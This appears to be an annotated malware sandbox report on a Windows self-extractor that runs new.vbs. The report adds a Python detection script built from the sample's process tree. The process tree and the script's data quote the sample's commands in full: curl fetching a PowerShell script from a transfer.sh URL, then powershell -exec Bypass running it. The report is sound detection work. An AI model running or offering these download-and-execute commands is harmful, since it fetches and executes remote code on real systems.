Analysis
max time kernel: 30s
max time network: 33s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 17/01/2023, 08:26

Static task: static1
Behavioral task: behavioral1
    Sample: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
    Resource: win7-20221111-en
Behavioral task: behavioral2
    Sample: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
    Resource: win10v2004-20221111-en
General
Target: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Size: 547KB
MD5: b0ab211e83a23d58e1322e4d2d6f0a96
SHA1: d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
SHA256: 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
SHA512: 4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
SSDEEP: 3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Signatures

Adds Run key to start application (2 TTPs, 2 IoCs)
    Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
        process: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
    Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""
        process: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
    Caveat: this RunOnce value does not start the payload. The value name wextract_cleanup0, the IXP000.TMP directory and the advpack.dll,DelNodeRunDLL32 command are the cleanup hook that the Windows self-extractor (WEXTRACT, the engine behind IExpress packages) registers so that its temporary extraction directory is deleted at the next logon. What the signature actually tells an analyst is that the sample is a self-extracting package whose embedded run command is cmd /c new.vbs (see the process tree below); it is not persistence for the downloaded script.

Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s). The sandbox labels this "likely ransomware behaviour", but the check is a generic heuristic and nothing else in this report (no file encryption, ransom note or shadow-copy deletion) corroborates it.

Suspicious behavior: EnumeratesProcesses (1 IoCs)
    pid 1640, powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
    Token: SeDebugPrivilege, pid 1640, powershell.exe

Suspicious use of WriteProcessMemory (21 IoCs)
    The report repeats each parent/child pair three times; each pair is shown once here with its count. Every pair matches a parent starting the child shown in the process tree, and no write into an unrelated process is recorded, so this is process-creation noise rather than evidence of injection.
    description                       | pid  | Process                                    | procid_target | count
    PID 2024 wrote to memory of 2032  | 2024 | {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe | 28            | 3
    PID 2032 wrote to memory of 808   | 2032 | cmd.exe                                    | 30            | 3
    PID 808 wrote to memory of 964    | 808  | WScript.exe                                | 31            | 3
    PID 964 wrote to memory of 1804   | 964  | cmd.exe                                    | 33            | 3
    PID 808 wrote to memory of 1860   | 808  | WScript.exe                                | 35            | 3
    PID 1860 wrote to memory of 1572  | 1860 | cmd.exe                                    | 36            | 3
    PID 1572 wrote to memory of 1640  | 1572 | cmd.exe                                    | 37            | 3
Processes

1. C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
   command line: "C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"
   PID: 2024
   - Adds Run key to start application
   - Suspicious use of WriteProcessMemory
    2. C:\Windows\system32\cmd.exe
       command line: cmd /c new.vbs
       PID: 2032
       - Suspicious use of WriteProcessMemory
        3. C:\Windows\System32\WScript.exe
           command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"
           PID: 808
           - Suspicious use of WriteProcessMemory
            4. C:\Windows\System32\cmd.exe
               command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
               PID: 964
               - Suspicious use of WriteProcessMemory
                5. C:\Windows\system32\cmd.exe
                   command line: cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
                   PID: 1804
            4. C:\Windows\System32\cmd.exe
               command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
               PID: 1860
               - Suspicious use of WriteProcessMemory
                5. C:\Windows\system32\cmd.exe
                   command line: cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                   PID: 1572
                   - Suspicious use of WriteProcessMemory
                    6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                       command line: powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                       PID: 1640
                       - Suspicious behavior: EnumeratesProcesses
                       - Suspicious use of AdjustPrivilegeToken
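The process tree is the part of this report a detection engineer would turn into a rule: a self-extractor running from %TEMP% launches cmd.exe, which runs WScript.exe on the extracted new.vbs, which in turn uses cmd.exe to fetch a .ps1 with curl into AppData\Roaming and then executes it with powershell.exe -exec Bypass. The Python below is an added example and is not part of the sandbox report or of the sample. It re-expresses the tree as Sysmon-style process-creation records (constructed by hand from the pids, image paths and command lines shown above, not captured telemetry), then runs three per-stage rules and one whole-chain rule over them. The record field names, rule names and the set of flag spellings matched are this example's own assumptions; the abbreviations -ex, -exec and -ep that the regex accepts for -ExecutionPolicy are valid because powershell.exe resolves unambiguous parameter prefixes.

```python
import re
from typing import Dict, List, Tuple

# Process-creation records constructed by hand from the process tree in the report above.
# The layout loosely follows a Sysmon Event ID 1 record (pid, parent pid, image, command
# line); these are not captured telemetry, only the page's tree re-expressed as data.
EVENTS: List[Dict] = [
    {"pid": 2024, "ppid": 0, "image": r"C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"'},
    {"pid": 2032, "ppid": 2024, "image": r"C:\Windows\system32\cmd.exe", "cmdline": "cmd /c new.vbs"},
    {"pid": 808, "ppid": 2032, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"'},
    {"pid": 964, "ppid": 808, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1'},
    {"pid": 1804, "ppid": 964, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1"},
    {"pid": 1860, "ppid": 808, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1'},
    {"pid": 1572, "ppid": 1860, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1"},
    {"pid": 1640, "ppid": 1572, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# curl ... -o/--output <file>.ps1: a script fetched straight to disk for later execution
CURL_TO_PS1 = re.compile(r"\bcurl(?:\.exe)?\b.*\s(?:--output|-o)\s+\S+\.ps1\b", re.IGNORECASE)
# powershell -ExecutionPolicy Bypass and the prefix abbreviations powershell.exe accepts (-ex, -exec, -ep)
PS_BYPASS = re.compile(r"\bpowershell(?:\.exe)?\b.*\s-(?:ex\w*|ep)\s+bypass\b", re.IGNORECASE)
# a script executed from the per-user roaming profile
ROAMING_PS1 = re.compile(r'\\AppData\\Roaming\\[^\s"]+\.ps1\b', re.IGNORECASE)
# root executable living in the user's temp directory (where the self-extractor ran from)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of an image path (text after the last backslash)."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events: List[Dict], pid: int) -> List[Dict]:
    """Event records from the root ancestor down to `pid`, following ppid links."""
    by_pid = {e["pid"]: e for e in events}
    chain: List[Dict] = []
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur["pid"] not in seen:  # `seen` guards against pid reuse loops
        seen.add(cur["pid"])
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    chain.reverse()
    return chain


def lineage(events: List[Dict], pid: int) -> List[str]:
    """Image names of the ancestry, root first."""
    return [image_name(e["image"]) for e in ancestry(events, pid)]


def detect(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs for every event matching one of the chain's stages."""
    by_pid = {e["pid"]: e for e in events}
    findings: List[Tuple[str, int]] = []
    for ev in events:
        name = image_name(ev["image"])
        parent = by_pid.get(ev["ppid"])
        parent_name = image_name(parent["image"]) if parent else ""
        cmd = ev["cmdline"]

        # Stage 1: a script host launching a shell (new.vbs -> cmd.exe in the report)
        if parent_name in SCRIPT_HOSTS and name == "cmd.exe":
            findings.append(("script_host_spawns_cmd", ev["pid"]))

        # Stage 2: curl writing a .ps1 to disk; fires on every process whose command
        # line carries the download, which includes the cmd.exe wrapper
        if CURL_TO_PS1.search(cmd):
            findings.append(("curl_download_ps1", ev["pid"]))

        # Stage 3: only the powershell.exe process itself, so the cmd.exe wrappers do not double-count
        if name == "powershell.exe" and PS_BYPASS.search(cmd):
            rule = "powershell_bypass_roaming_script" if ROAMING_PS1.search(cmd) else "powershell_bypass"
            findings.append((rule, ev["pid"]))

            # Whole-chain rule: root image in %TEMP% and a script host somewhere in the ancestry
            chain = ancestry(events, ev["pid"])
            names = {image_name(e["image"]) for e in chain}
            if chain and TEMP_DIR.search(chain[0]["image"]) and names & SCRIPT_HOSTS:
                findings.append(("temp_dropper_script_host_powershell", ev["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:40s} pid={pid}")
    print("chain:", " > ".join(lineage(EVENTS, 1640)))
```

The per-stage rules are deliberately narrow (curl to a .ps1, a script host spawning cmd.exe, a policy bypass on powershell.exe itself) so that each can be tuned on its own; the whole-chain rule is what separates this sample from an administrator running a bypass on a signed script, because it additionally requires the root executable to live in %TEMP% and a script host to sit in the ancestry.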
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 300.0MB
MD5: f7e7099eea0cc25fc49d04cd53c573a1
SHA1: 3abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256: b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512: c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074